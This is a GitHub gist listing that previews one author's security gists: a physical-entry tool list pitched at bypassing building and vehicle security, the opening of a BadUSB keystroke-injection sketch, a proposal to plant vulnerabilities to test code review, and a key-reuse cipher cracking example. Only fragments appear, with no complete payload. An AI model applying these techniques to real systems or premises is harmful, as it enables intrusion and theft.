@lrvick
lrvick / physsec_shopping.md
Last active April 3, 2023 17:16
PhysSec Shopping List

PhysSec Shopping List

Need to get into a building? Start a police car? Borrow a bulldozer? Go to a restricted elevator floor? It is pretty easy with the right tools and sometimes a bit of practice.

Knowing what those tools even are is half the battle. This guide attempts to solve that for you for free.

Actually obtaining these tools is non-trivial but -all- of them can be obtained

@lrvick
lrvick / role.md
Last active September 21, 2024 12:26
My default canned response to all recruiters. Know what you want out of your career and articulate it specifically if you want to get it either at your current employer, or a different one.

I know exactly what I want in a long term role so I can save us some time.

For me to be willing to change jobs at this point I would expect:

  • A high level of autonomy where I am allowed to work weird hours.
  • Have my obsession for auditable everything be humored/tolerated
    • I prefer to work with open platforms like RISC-V and OpenPower and open operating systems like Linux, FreeBSD, OpenBSD, seL4, etc.
    • I am never asked to rely on any software I can't audit on any of my personal or company devices.
  • No need to go find clients myself or worry about the business side of the house
  • Travel/lodging covered for the 2-3 security conferences I try to attend every year.
#!/bin/bash
# Let GPG know about our current terminal
gpg-connect-agent updatestartuptty /bye
# Start compositor for faster rendering for terminals etc
compton &
# Set wallpaper
nitrogen --set-scaled ~/.wallpaper/yourcoolwallpaper.jpg
@lrvick
lrvick / usbninja.ino
Last active September 6, 2019 05:20
One size fits all BadUSB attack for Mac/Windows for the USBNinja. Logs all attacks to server. Server can optionally provide a unique payload for each target hostname/user combo.
#include <NinjaKeyboard.h>
void setup(){}
void loop() {}
void payloadA(){
USBninjaOnline();
NinjaKeyboard.begin();
NinjaKeyboard.delay(1000);
@lrvick
lrvick / distributed_trust_git_flow.md
Last active February 20, 2019 00:51
An opinionated git workflow optimized for a strong resistance to tampering by any single party.

Distributed Trust Git Flow

Goals

  • Remove chance of undetected malicious or accidental mutations of code in VCS
  • The VCS and review tool servers as well as their maintainers must never be trusted.
  • We must be able to cryptographically prove
    • Who authored all commits
    • Who on engineering team signed the release candidate tag on a ref
    • Who on release team signed the release tag for a ref
@lrvick
lrvick / hardening_playbook.md
Created January 25, 2019 10:33
Hardening Playbook: My dumping ground for my system hardening research, mostly focusing on Linux but paying attention to other systems.

Hardening Playbook

Threat profile

  • Attacker has unlimited funding
  • Attacker has decades of patience
  • Attacker knows everything you do and more
  • Attacker has no morals and can break any law
  • Attacker can compromise any single system
  • Attacker can compromise any single individual
@lrvick
lrvick / random_red_team.md
Created December 12, 2018 03:03
Random Red Team

Random Red Team

Summary

This document seeks to detail intentionally introducing security vulnerabilities into projects to test code review processes and foster a healthy and expected culture of distrust and higher security scrutiny during code reviews, regardless of the social standing or experience level of the author.

Motivation

@lrvick
lrvick / diff-tree.md
Created October 2, 2018 22:46
Git diff-tree issues

Git 2.11.0

$ git rev-parse HEAD
2e6215c920f384f958dc6dafcbaee5698c965657
$ git diff-tree -p "HEAD^"..HEAD | sha256sum
ae4fc1d2285ab6ac84cdd8ff6235f5534b6ded467dd8f586cbe1bfe885cc1afe  -
$ git diff-tree -p "HEAD^"..HEAD | git patch-id --stable
d9c0bf01265096e69f24b6e10d6c471f92d203c3 0000000000000000000000000000000000000000
@lrvick
lrvick / crack_otp.py
Created September 9, 2018 03:28
Example for cracking stream ciphers with recycled keys.
messages = (
"This is the secret message one. It is the best one",
"I am typing things to fill up space. La La La LA LAH LAH LAH LAH LAH",
"Why are the ponies attacking my brain?! I DON'T KNOW!",
"The chicken crossed the road in order to murder all of the babies",
"I think the most evil thing is the chocolate on the road that kills",
"There is a light above my head and it is bright and should die",
"bunnies are cute and I want to squeeze them to DEATH",
"All this talk about death is making me hungry. I should find food",
@lrvick
lrvick / dc26.md
Last active August 10, 2018 04:49
Defcon 26 Plans

Defcon 26

Itinerary

Thursday

09:00

  • Arrive at Caesars
  • Get admission badges
  • Check in to room